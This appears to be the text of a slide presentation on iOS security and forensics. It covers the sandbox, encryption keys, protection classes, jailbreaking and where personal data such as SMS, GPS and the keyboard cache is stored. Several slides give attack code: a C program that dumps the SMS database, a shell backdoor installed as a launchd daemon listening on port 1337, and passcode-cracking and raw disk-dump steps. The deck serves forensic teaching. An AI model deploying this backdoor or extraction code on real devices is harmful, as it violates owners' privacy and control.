iOS Security and Forensics Powerpoint Templates Page 1 Apple’s Security Model - iDevice applications available on Apple Store - Tested, analyzed, approved, signed then distributed by Apple services - Installed in: - /private/var/mobile/Applications/{Unique_App_ID} - Full list of installed applications : - /private/var/mobile/Library/Caches/com.apple.mobile.ins tallation.plist - Executed under “mobile” user in TrustedBSD sandbox - ASLR and DEP activated - All that, on a fully encrypted filesystem. Powerpoint Templates Page 2 Apple’s Directories Sandboxing Powerpoint Templates Page 3 TrustedBSD Sandbox - Open source project for FreeBSD systems - Sponsored by Apple, Google, Yahoo!, NSA… - Modified and used by Apple for OS X and iOS - Installs series of hooks, in order to intercept and filter syscalls. - Policy retrieved from a human readable file then passed to the kernel in a binary format. - Finally the kernel installs sanbox rules for the process Powerpoint Templates Page 4 Policy rules - Stored in /usr/share/sandbox and hardcoded in the Kernel - Some policies configuration are done by the user through popups - Written in ESDL schema, human readable: (version 1) (allow default) (deny file-read-data (regex #”^/private/tmp/test\.c$”)) - $ sandbox_exec –p ‘{$POLICY}’ /bin/sh - $ file /private/tmp/test.c test.c: cannot open: Operation not permitted - $ sandbox_exec –n no-internet /bin/sh - $ ping 4.2.2.2 ping: sendto: Operation not permitted - The sandbox_init() syscall uses the libsandbox.dylib to convert the policy into binary format. Powerpoint Templates Page 5 iDevice Storage Device NAND storage device exploited like the following: - BOOT (block 0): contains the bootloader - PLOG (block 1) : contains the EMF, BAG1 and Dkey - EMF : used to encrypt the entire filesystem and HFS journal - BAG1 : used to encrypt the keybag - Dkey : used to encrypt files without encryption policy class - NVM (block 2-7) : stores the NVRAM parameters - FIRM (block 8-15) : stores the firmware, iBoot, device tree & logos - FSYS (block 16-4084): stores the encrypted filesystem - RSRV (last 15 blocks): reserved Powerpoint Templates Page 6 Encryption mechanism Starting from iPhone 3GS, Apples devices contain hardware encryption processor. It permit the following: - UID keys stored in the processor - 0x835 & 0x89B keys derived from the UID key - Filesystem : - Data partition encrypted with EMF (AES-128) - System partition encrypted with hardcoded AES-256 key (in kernel & bootloaders) - Keychain encryption with the Dkey - The Keybag contains Master Keys for Protection Classes - Some Master Keys encrypted with passcode - Each file on the filesystem encrypted with a “cprotect” key - Each “cprotect” key is encrypted with the file’s associated Protection Class Master Key At boot, the EMF and Dkey are extracted automatically Powerpoint Templates Page 7 Protection Classes Files decryption is defined according to their associated “Protection Classes”. Protection Classes used for files: - NSFileProtectionComplete: file only decrypted when the iDevice is unlocked. - NSFileProtectionCompleteUnlessOpen: file only decrypted when the iDevice is unlocked. It stay decrypted even after lock if the application maintains it open. - NSFileProtectionCompleteUntilUserAuthentication: file decrypted after a successful unlock. It remains decrypted until next reboot. - NSFileProtectionNone: file decrypted using the Dkey. - NSFileProtectionRecovery: undocumented. Protection Classes used for keychains: - kSecAttrAccessibleWhenUnlocked[ThisDeviceOnly] - kSecAttrAccessibleAfterFirstUnlock[ThisDeviceOnly] - kSecAttrAccessibleAlways[ThisDeviceOnly] Powerpoint Templates Page 8 Data wiping and recovery - Filesystem’s wiping consists of rewriting the EMF & Dkey - Files deletion consists of rewriting the associated cprotect - The filesystem’s journal: - encrypted with the Dkey - contains cprotect keys in cleartext - rotation depending on filesystem’s activity - could be retrieved and used to recover deleted files - /dev/disk0s1s2 raw data backup: - Connect the iDevice to power supply - Disable the autolock - Run: $ dd if=/dev/rdisk0 bs=4k | ssh -C username@computer_ip 'dd of=/home/{$USER}/dump.dmg' - Wait… for… a… while…. Powerpoint Templates Page 9 Security chain Powerpoint Templates Page 10 Jailbreak - Execution of third party applications/code allowed - Unsigned code execution granting (depending on jailbreaks) - Complete bypass of the sandbox - Root (/) partition mounted in read/write. - Before jailbreak: - $ cat /etc/fstab /dev/disk0s1 / /dev/disk2s1 /private/var hfs hfs r rw 0 1 0 2 hfs hfs rw rw 0 1 0 2 - After jailbreak: - $ cat /etc/fstab /dev/disk0s1 / /dev/disk2s1 /private/var Note: on iOS >=5, /dev/disk2s1 became /dev/disk1s2 Powerpoint Templates Page 11 Useful information - launchd: first executed binary while booting (init like) - watchdog: checks if a process is running in memory more than 5mn, if yes it reboots the iDevice - launchctl : used to control daemons - $ launchctl load com.adel.reverse_shell.plist - ldid: Link Identity Editor, used to sign a binary - $ ldid –S my_binary - usbmux: protocol created to encapsulate TCP over USB connections. Optimized and used by iTune. - XCode: developpment platform on Mac OS X, freely downloadable on Apple Store - Cydia Store: online non official applications store for jailbroken devices - SSH binaries: freely available package over Cydia store. Powerpoint Templates Page 12 HelloWorld for iDevice - Simple HelloWorld\n program: - $ cat helloworld.c #include <stdio.h> int main(int argc, char *argv[]) { printf(“HelloWorld\n”); return 0; } - $ export PF=/Developer/Platforms/iPhoneOS.platform - $ $PF/Developer/usr/boin/arm-apple-darwin10-llvm-gcc-4.2 -o hello hello.c -isysroot $PF/Developer/SDKs/iPhoneOS5.0.sdk/ - Binary auto-siging: -$ ldid –S hello - Simple binary file transfer over SSH: - $ scp hello root@<iDevice_IP_Addr>:/usr/bin/my_binary Powerpoint Templates Page 13 Local File Disclosure -$ cat lfi_smsdb.c #include <stdio.h> main() { FILE *fp=NULL; int c=0; fp=fopen("/var/mobile/Library/SMS/sms.db","r"); do { c=fgetc(fp); printf("%c",c); } while (!feof(fp)); fclose(fp); return 0; } Powerpoint Templates Page 14 Reverse Shell -$ cat reverse_shell.c #include <stdio.h> #include <unistd.h> main() { execve("/bin/sh", NULL, NULL); return 0; } Powerpoint Templates Page 15 Process Daemonizing - Copying reverse_shell to the iDevice /usr/bin - Copying com.adel.reverse_shell.plist to the iDevice /System/Library/LaunchDaemons/ - Rebooting the iDevice or : - $ cd /System/Library/LaunchDaemons - $ launchctl load ./com.adel.reverse_shell.plist Powerpoint Templates Page 16 plist Manifest Format - XML file format, used for configuration purpose - $ cd /System/Library/LaunchDaemons - $ cat com.adel.reverse_shell.plist <?xml version="1.0" encoding="UTF-8"?> <plist version="1.0"> ... <key>Label</key> <string>com.adel.reverse_shell</string> <key>Program</key> <string>/usr/bin/reverse_shell</string> <key>Sockets</key> <dict> <key>Listeners</key> <dict> <key>SockServiceName</key> <string>1337</string> </dict> </dict> ... </plist> Powerpoint Templates Page 17 Physical Access Pwnage Many possibilities: -Easy: the iDevice does not have passcode - Full access to data over SpringBoard, SSH or after boot on ramdisk - Medium: the iDevice has a passcode < 4 digits - Booting on ramdisk, patching the kernel and cracking the passcode - Needs max 30mn of passcode cracking (10^4 possibilities) - Medium ++: the iDevice has a passcode > 5 digits - Could take time for cracking - The xkcd 5$ wrench shall be used ! - Hard: the iDevice has a boot passcode (EMF + Dkey encrypted with that) - ? Does it exist ? Powerpoint Templates Page 18 LiveCD vs RAMDISK - A 2mb HFS+ container with: - customized launchd - binaries to copy/execute - plist files - Loaded into the iDevice over USB and after reboot to DFU mode - exploit the iDevice vulnerability - load the ramdisk on RAM - execute launchd - disable watchdog - option 1: - scan and mount the filesystem (EMF + Dkey auto-extracted) - copy files on the filesystem - chroot on the mounted filesystem - option 2: - initialize the usbmux protocol - read and send raw NAND data over USB (EMF + Dkey must be extracted manually Powerpoint Templates Page 19 Sensitive Data - Keyboard cache - Clipboard buffer - Consolidated GPS positions databse and latest GPS position - Applications and Safari snapshot cache - Google maps cache and history - Address book, photos, songs, voice records, notes, calendar, call history - SMS, MMS, drafts and SpotLight SMS cache - Geolocalization tags on photos - Safari cache, search list, bookmarks, cookies, history and WebKit cache - Installed applications list - Emails, applications, their data and cache - Lastest dialed number, bookmarked contact list, IMSI, ICCID - Configured access point list … Powerpoint Templates Page 20 Keyboard Cache Contains the keyboard cache - Written known and unknown words - One cache per language - Available in /private/var/mobile/Library/Keyboard/ Powerpoint Templates Page 21 Keyboard Cache Powerpoint Templates Page 22 Applications snapshot Available in: $ /private/var/mobile/Library/Caches/Snapshots/{APP_NAME}/{NAME}.jpg Powerpoint Templates Page 23 Consolidated GPS Positions Databse Available in: $ /private/var/root/Library/Caches/locationd/consolidated.db Powerpoint Templates Page 24 Consolidated GPS Positions Databse Available in: $ /private/var/root/Library/Caches/locationd/consolidated.db Powerpoint Templates Page 25 Consolidated GPS Positions Databse Available in: $ /private/var/root/Library/Caches/locationd/consolidated.db Powerpoint Templates Page 26 End. Questions ? Powerpoint Templates Page 27